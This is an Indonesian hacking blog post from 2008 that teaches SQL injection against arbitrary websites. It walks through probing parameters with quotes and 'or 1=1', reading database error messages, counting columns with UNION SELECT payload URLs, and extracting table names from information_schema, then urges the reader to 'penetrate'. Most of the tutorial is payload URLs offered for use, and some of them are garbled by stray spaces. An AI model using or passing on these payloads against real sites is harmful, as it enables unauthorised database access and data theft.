QIWS CYBER SYSTEM: SQL INJECTION

SQL INJECTION

Posted: Rabu, 03 Desember 2008 by QIWS in Label: Hacking

Kali ini Gw pengen sher mengenai "SQL INJECTION" Semuanya berawal karena gua ngeliat-liat semuanya pada rame masalah web attack... And Gw sendiri sekarang masih belajar so mari kita belajar bersma jaelah kaya guru lagi ni gw...langsung aja yuk

contoh Web trget : http://contoh.com

- untuk mengetahui apa itu web target memeiliki hole apa tidak ada baiknya melakukan ini dulu : tanda petik,or 1=1,etc / apajalah sesuka hatimu

- Bila mengunakan cara diatas tanda petik,or 1=1,dll maka umumnya kita akan mendapatkan pesan error.
http://www.contoh.com/blabla.php?id=133'
Eror TIPE : pada php.
Warning: mysql_fetch_array(): supplied argument is not a valid MySQL result resource in blah/blah/blah.php on line x

pada asp.
[MySQL][ODBC x.xx Driver][mysqld-x.x.xxx-xxx]You have an error in your SQL syntax; check the manual that corresponds to your MySQL server version for the right syntax to use near 'x' at line x

cara ini tidak efektif untuk php karena ada hantu "sql error handling" takuttttttttttttttt

- Lalu gimana???Pake ni za Ah..... (tanda minus,and 1=1,and 1=2,etc)
Kalo cara ini umumnya kita akan mendapat teks yang menghilang,blank,picture yang tidak bisa terlihat,weeeekkkk ko gitu??? Yaialah..... kalo error (jarang terjadi)

- Contoh http://www.contoh.com/aktual/berita.php?id=1432
sekarang berikan tanda minus setelah = atau bisa juga -1 ,Nah bila teks hilang maka vulnerable ASYIKKKKKK.....AYO eksplorasi !!! Nah sekarang jadi gini http://www.contoh.com/aktual/berita.php?id=-1432

- bila sodara2 mengetahui situs tersebut vulnerable melalui tanda petik,or 1=1,etc Nah..laLu tahap slanjutnya mengunakan union select dan add number ("column count ")hingga muncul angka pada web

- contoh melakuan column count :
union select diikuti dengan angka.

http://www.target.com/aktual/berita.php?id=-1%20union%20sele ct%201/*

http://www.target.com/aktual/berita.php?id=-1%20union%20sele ct%201,2/*

http://www.target.com/aktual/berita.php?id=-1%20union%20sele ct%201,2,3,/*

ternyata yang keluar sampai angka 9

disitu kita bisa melihat dua angka 9 dan 2
query yang kita gunakan adalah : union select table_name from information_schema.tables where table_schema=database() limit 0,1

masukan "table_name" pada angka yang keluar (9 atau 2) diikuti "from information_schema.tables where table_schema=database() limit 0,1"
menjadi,

http://www.target.com/aktual/berita.php?id=-1%20union%20sele ct%201,table_name,3,4,5,6,7,8,920%20FROM%20information_schem a.tables%20where%20table_schema=database()%20limit%200,1/*

kamu juga bisa memasukan table_name ke angka 9 (karna angka yang keluar 9 dan 2)

http://www.target.com/aktual/berita.php?id=-1%20union%20sele ct%201,2,3,4,5,6,7,8,table_name20%20FROM%20information_schem a.tables%20where%20table_schema=database()%20limit%200,1/*

Udah dec tinggal PENETRASI ..........

QIWS CYBER SYSTEM

About Me

Google Translate

Visitor Information

Labels

Blog Archive

ShoutBox

LINK

SQL INJECTION

0 komentar:

About Me

Google Translate

Visitor Information

Labels

Blog Archive

ShoutBox

LINK

Langganan

SQL INJECTION

0 komentar: